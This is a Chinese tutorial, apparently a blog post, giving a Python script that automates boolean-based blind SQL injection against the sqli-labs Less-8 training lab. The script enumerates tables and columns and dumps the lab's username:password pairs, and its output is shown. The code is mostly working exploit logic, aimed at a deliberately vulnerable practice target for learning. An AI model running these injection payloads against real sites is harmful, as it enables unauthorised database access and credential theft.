在打sqli-labs关卡时,手工用来验证可以,但全部搂出数据有些吃力了,可以使用burp suite或者编写自动化工具进行。
本文是用python编写的自动化工具打第8关,详细代码如下。
备注:
1、本文使用 docker 搭建 sqli-labs,代码仅用于演示实现功能的逻辑,并未按照 Python 代码规范和标准书写。
2、要求会requests模块的使用。
import requests
import string
from test.request_s import ascii
# Printable ASCII range probed by the character loops below is 32-126
# This program exercises sqli-labs Less-8 (a boolean-based blind injection lab)
# Loop over candidate lengths; the n whose response length differs from the
# "false" page is the length of the database name
def db_len(IP: str) -> int | None:
    """Return the length of the current database name, or None if no n in 0..19 matches.

    Oracle: in the author's docker lab the "false" page is 722 bytes long, so
    any other response length is read as "true". That baseline is specific to
    this deployment and has to be re-measured elsewhere.
    """
    for n in range(20):
        URL = "http://{}/Less-8/?id=1\' " \
              "and length(database())={} --+".format(IP, n)
        res = requests.get(url=URL)
        # On the first run len(res.text) came out as 723; you have to know in
        # advance that 723 is not the correct database length
        if len(res.text) != 722:
            return n
# Recover the database name character by character
def db_name(IP: str, dblen: int) -> str:
    """Return the database name, recovered one position at a time (lower-case a-z only).

    `dblen` is accepted but never used: the loop always probes positions 0
    through 8. For each position all 26 letters are tried and a letter is
    appended whenever the response length differs from the 722-byte "false"
    page. There is no `break` after a hit, so every position costs 26 requests.
    Position 0 is presumably a wasted pass (MySQL substr positions start at 1) — confirm.
    """
    dbname = ""
    for n in range(9):
        # string.ascii_lowercase yields a-z; ascii_uppercase would give the upper-case set
        for alpha in string.ascii_lowercase:
            URL1 = "http://{}/Less-8/?id=1' " \
                   "and substr(database(),{},1)='{}' --+".format(IP, n, alpha)
            res1 = requests.get(url=URL1)
            if len(res1.text) != 722:
                dbname = dbname + alpha
    return dbname
# Count the tables in the current database; not suited to schemas with many tables
def tbl_count(IP: str) -> int | None:
    """Return the number of tables in the current database, or None if it is not in 0..49.

    One request per candidate n; the first n whose response length differs
    from the 722-byte "false" page is returned.
    """
    for n in range(50):
        URL = "http://{}/Less-8/?id=1' " \
              "and substr((select count(table_name) from information_schema.tables " \
              "where table_schema=database()),1)={} --+".format(IP, n)
        res = requests.get(url=URL)
        if len(res.text) != 722:
            return n
# Length of the i-th table name
def tbl_len(IP: str, i: int) -> int | None:
    """Return the length of the i-th table name (0-based, via `limit i,1`), or None if not in 0..19.

    Uses the same 722-byte response-length oracle as db_len().
    """
    for n in range(20):
        URL2 = "http://{}/Less-8/?id=1' " \
               "and length((select table_name from information_schema.tables " \
               "where table_schema=database() limit {},1))={} --+".format(IP, i, n)
        res = requests.get(url=URL2)
        if len(res.text) != 722:
            return n
# Given a table-name length, recover the i-th table name
def tbl_name(IP: str, i: int, t_len: int) -> str:
    """Return the i-th table name, recovered one position at a time (lower-case a-z only).

    Probes positions 0..t_len (t_len + 1 passes; position 0 is presumably
    empty in MySQL — confirm) and tries all 26 letters at each, so the call
    costs 26 * (t_len + 1) requests. A letter is appended whenever the
    response length differs from the 722-byte "false" page; no `break` after a hit.
    """
    tblname = ""
    for n in range(t_len + 1):
        # string.ascii_lowercase yields a-z; ascii_uppercase would give the upper-case set
        for alpha in string.ascii_lowercase:
            URL3 = "http://{}/Less-8/?id=1' " \
                   "and substr((select table_name from information_schema.tables " \
                   "where table_schema=database() limit {},1),{},1)='{}' --+"\
                   .format(IP, i,n,alpha)
            res1 = requests.get(url=URL3)
            if len(res1.text) != 722:
                tblname = tblname + alpha
    return tblname
# Character set extended with upper-case letters, digits and two punctuation marks
def make_alpha_num():
    """Return the candidate character set: a-z, A-Z, 0-9, then ',' and '.'.

    Pure helper; it is defined here but not called anywhere in this file, which
    instead probes raw ASCII codes 32-126 in get_columns()/get_tbl_contens().
    """
    digits = "0123456789"
    punctuation = ',.'
    return "".join((string.ascii_lowercase, string.ascii_uppercase, digits, punctuation))
# Length of group_concat(column_name) for the given table
def get_col_len(IP: str, tbl_name: str) -> int | None:
    """Return the length of the comma-joined column list of `tbl_name`, or None if not in 0..499.

    One request per candidate n (up to 500); the first n whose response
    length differs from the 722-byte "false" page is returned. `tbl_name` is
    interpolated straight into the payload and is expected to be a plain
    identifier such as "users".
    """
    for n in range(500):
        URL = "http://{}/Less-8/?id=1' " \
              "and length((select group_concat(column_name) " \
              "from information_schema.columns " \
              "where table_schema=database() and table_name='{}'))={} --+"\
              .format(IP, tbl_name, n)
        res = requests.get(url=URL)
        if len(res.text) !=722:
            return n
# Recover all column names of a table as one comma-joined string
def get_columns(IP: str, tbl_name: str, col_len: int) -> str:
    """Return group_concat(column_name) for `tbl_name`, recovered one character at a time.

    For each position 0..col_len every printable ASCII code 32-126 is tried
    (up to 95 requests per position, no `break` after a hit); a matching code
    is converted with ascii.ascii_alpha() (chr) and appended. Note that
    `ascii` here is the imported test.request_s helper module, which shadows
    the builtin ascii().
    """
    tbl_columns = ""
    for n in range(col_len + 1):
        for param in range(32,127):
            URL = "http://{}/Less-8/?id=1' " \
                  "and ascii(substr((select group_concat(column_name) " \
                  "from information_schema.columns " \
                  "where table_schema=database() and table_name='{}'),{},1))={} --+"\
                  .format(IP, tbl_name, n, param)
            res = requests.get(url=URL)
            if len(res.text) != 722:
                ascii2alpha = ascii.ascii_alpha(param)
                tbl_columns = tbl_columns + ascii2alpha
    return tbl_columns
# Number of rows in the table
def get_rows(IP: str, tbl_name: str) -> int | None:
    """Return the row count of `tbl_name`, or None if it is not in 0..49.

    The payload counts the `username` column specifically, so this only works
    for tables that have such a column (the lab's "users" table does).
    """
    for n in range(50):
        URL = "http://{}/Less-8/?id=1' " \
              "and substr((select count(username) from {}),1)={} --+"\
              .format(IP, tbl_name, n)
        res = requests.get(url=URL)
        if len(res.text) != 722:
            return n
# Dump the table contents
def get_tbl_contens(IP: str, tbl_name: str) -> str:
    """Return group_concat(username,':',password) of `tbl_name`, recovered one character at a time.

    Positions 0..199 are probed with every printable ASCII code 32-126, so a
    full run issues up to 200 * 95 near-identical GET requests that differ
    only in the two numbers inside the `ascii(substr(...))` clause — the
    high-volume, single-parameter-varying pattern that server logs and
    rate-limiting rules key on. The column names username/password are
    hard-coded; the loop never stops early, even once the string is exhausted.
    """
    tbl_contens = ""
    # 200 position passes makes this slow to run
    for n in range(200):
        for param in range(32,127):
            URL = "http://{}/Less-8/?id=1' " \
                  "and ascii(substr((select group_concat(username,':',password) " \
                  "from {}),{},1))={} --+".format(IP, tbl_name, n, param)
            res = requests.get(url=URL)
            if len(res.text) !=722:
                ascii2alpha = ascii.ascii_alpha(param)
                tbl_contens = tbl_contens + ascii2alpha
    return tbl_contens
# Lab target: the author's docker sqli-labs instance on a private network address
IP = "192.168.101.45"
# Table to dump; get_rows()/get_tbl_contens() assume it has username and password columns
tbl_name = "users"
# Step 1: length of the comma-joined column list, then the column names themselves
col_len = get_col_len(IP, tbl_name)
tbl_columns = get_columns(IP, tbl_name, col_len)
print("{} 表中的字段group_concat组合是:{}".format(tbl_name, tbl_columns))
# Step 2: row count (counts the username column)
tbl_rows = get_rows(IP, tbl_name)
print("{}表中共{}行".format(tbl_name, tbl_rows))
# Step 3: username:password pairs, character by character
tbl_contens = get_tbl_contens(IP, tbl_name)
print("{}表中的内容是:{}".format(tbl_name, tbl_contens)) # this call takes a while
补充from test.request_s import ascii的代码,主要功能是实现字母和ascii码之间的转换。
# Convert a single character such as 'a' to its code point
def alpha_ascii(alpha):
    """Return the integer code point of the one-character string `alpha` (thin wrapper over ord)."""
    return ord(alpha)
# Convert a code point back to its character
def ascii_alpha(ascii):
    """Return the one-character string for code point `ascii` (thin wrapper over chr).

    The parameter name shadows the builtin ascii() inside this function; it is
    kept because callers in this file pass it positionally under that name.
    """
    return chr(ascii)
运行结果如下:
users 表中的字段group_concat组合是:id,username,password
users表中共13行
users表中的内容是:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
Process finished with exit code 0